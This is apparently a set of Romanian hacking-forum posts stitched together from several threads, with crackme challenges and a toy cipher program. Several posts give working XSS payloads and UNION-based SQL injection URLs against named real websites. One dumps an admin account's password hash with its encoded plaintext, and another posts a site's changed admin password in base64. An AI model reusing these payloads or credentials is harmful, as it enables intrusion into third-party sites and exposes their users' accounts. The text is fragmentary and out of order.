Sega

Am postat rezolvarea, la ce mai postati? L.E: adminul a schimbat parola, dar nu a rezolvat vulnerabilitatea noua parola: YW5hY29uZGEyNw==

@curiosul unde vezi tu xss in poza ta? @silviu am postat deja rezolvarea

XSS http://www.nicepps.ro/cauta-pps-ppt-toate-categoriile-0-q-"><script>alert(1)</script>-m-orice-cuvant-pag-1.html http://www.nicepps.ro/index.php?action=felicitare&id=369'"><script>alert(1)</script> SQLI www.nicepps.ro/index.php?action=details&id=2561 and 1=2 UNION SELECT 1,group_concat(user,0x2c20,password,0x2c20,email,0x3c62722f3e),3,4,5,6,7,8,9,10,11,12,13 FROM users-- Admin : Pass AlexB : 90ae07eadcbfc3934252980ed73885d5 (adica YWxleDc3Nw==) Login page: admin @SirGod nu e logic? Era interesant la acel xss daca il introduci in search box nu trece de filtru, daca il introduci direct in url (mai sus) trece de acel filtru. Puteti da T.C

Acum am vazut ca mai are si SQLI @ak4d3a ia vezi daca gasesti vreun XSS intr-o pagina .HTML

Target: www.nicepps.ro Cauta un xss in site-ul asta si posteaza o poza (ascunde detaliile). Exemplu: http://postimage.org/image/pn4ob6rzb/ P.S: Nu e greu, just 4 fun Pana acum au gasit XSS-ul: Jimmy KodRSS ak4d3a blackboy[1337]

De ce il mai cereti?

Error parsing XSLT file: \xslt\PgShowFocus.xslt @Teros unde rah*t vezi tu SQLI? Daca apare o eroare nu e neaparat sqli.

dd

aa

Se mai trezesc multi care "inviati" topicuri vechi? Uitate la data thread-ului: 05-28-2006, 10:44 AM

Release date : 29 June 2008 Tu ce crezi?

Are XSS site-ul http://solinked.com/ La text: "><script>alert(document.cookie)</script>

Am gresit explicatia de la inceput: dupa N nu vine M ci O Exemplu era cu PALD (am modificat). Ms de observatie.

Am facut un programel in C++ dupa challenge-ul lui @Sulea si anume ACESTA CRIPTARE Exemplu: PALD 1) P e consoana : P+4=T 2) A e vocala : A+4=E; E+10=O; se insereaza in string, si tot ce se afla dupa O se incrementeaza cu 1; avem: TEOme 3)M e consoana : M+4=Q; 4)E e vocala : E+4=I; I+10=S; Rezultat final: TEOQIS DECRIPTARE Avem nevoie de un vector in care sa pastram pozitiile pt. decrementare. Luam vectorul vec[333]; Exemplu: TEOQIS 1)T-4=P; P e cons deci ramane asa, avem p 2)E-4=A; A e vocala => stergem urmatoarea litera si ramane paQIS si pastram pozitia curenta in i=0 vec=2; i++; 3)Q-4=M; avem: pamIS 4)I-4=E; E e voc stergem urmatoarea litera si ramane PAME la final in vec=lungimea noului string adica 4 Si acum de la vec[0] la vec[1]: adica de la 2 la 4 decrementam cu 1; paME => paLD Sper ca am fost explicit. Daca aveti o alta idee postati aici va rog. Sursa DOWNLOAD: MediaFire 2Shared GirlShare Program DOWNLOAD: MediaFire 2Shared GirlShare

Nu, pt. ca crackme-ul asta e prea usor. O sa postez maine unul un pic mai greut.

30/04/2011 data postarii challenge-ului O modalitate de aflare a versiunii: 1) http://www.lindell.fi/?id=-49 'union select 1, MySQL Error: 1222 (The used SELECT statements have a different number of columns) 2) http://www.lindell.fi/?id=-49 'union select 1,2' ... La fel pana cand eroare dispare (la 9) 9) http://www.lindell.fi/?id=-49 'union select 1,2,3,4,5,6,7,8,9' The requested URL /7 was not found on this server. Ne zice ce coloana se afiseaza si anume 7. Inlocuim 7 cu @@version. http://www.lindell.fi/?id=-49 'union select 1,2,3,4,5,6,@@version,8,9' The requested URL /5.0.22-log was not found on this server. Apache/2.2.3 (CentOS) Server at www.lindell.fi Port 80

Daca doreai sa afli singur, nu te uitai la comentarii. Luai string-ul si gaseai metoda de decriptare. In fine, am sters raspunsul ca vad ca te irita. Eu il pusesem pentru o verificare, ca dupa ce ai rezolvat sa te convingi de "puterile" tale. Uite ca am facut si rima PROGRAMEL: http://rstcenter.com/forum/40133-%5Bdecriptare3%5D-c-sursa.rst

Edit: am facut un program in C++ pt criptare si decriptare. Download links: MediaFire 2Shared GirlShare PROGRAMEL: http://rstcenter.com/forum/40133-%5Bdecriptare3%5D-c-sursa.rst

04-03-2011, 12:12 PM asta e data postarii threadului. So, poate vrea cineva sa vada cum gasesti versiunea, chiar daca se poate in 4 feluri.

http://www.apd.ro/publicatie.php?id=-24%20UNION%20ALL%20SELECT%201,2,convert%28version%28%29%20using%20latin1%29,4,5,6,7,8,9,10,11,12--

Bravo. MesajPreaScurt

@pelican nu stiu ce nu-ti convine... incearca sa afli parolele chiar daca e f usor

Un crackme pe 3 nivele. DOWNLOAD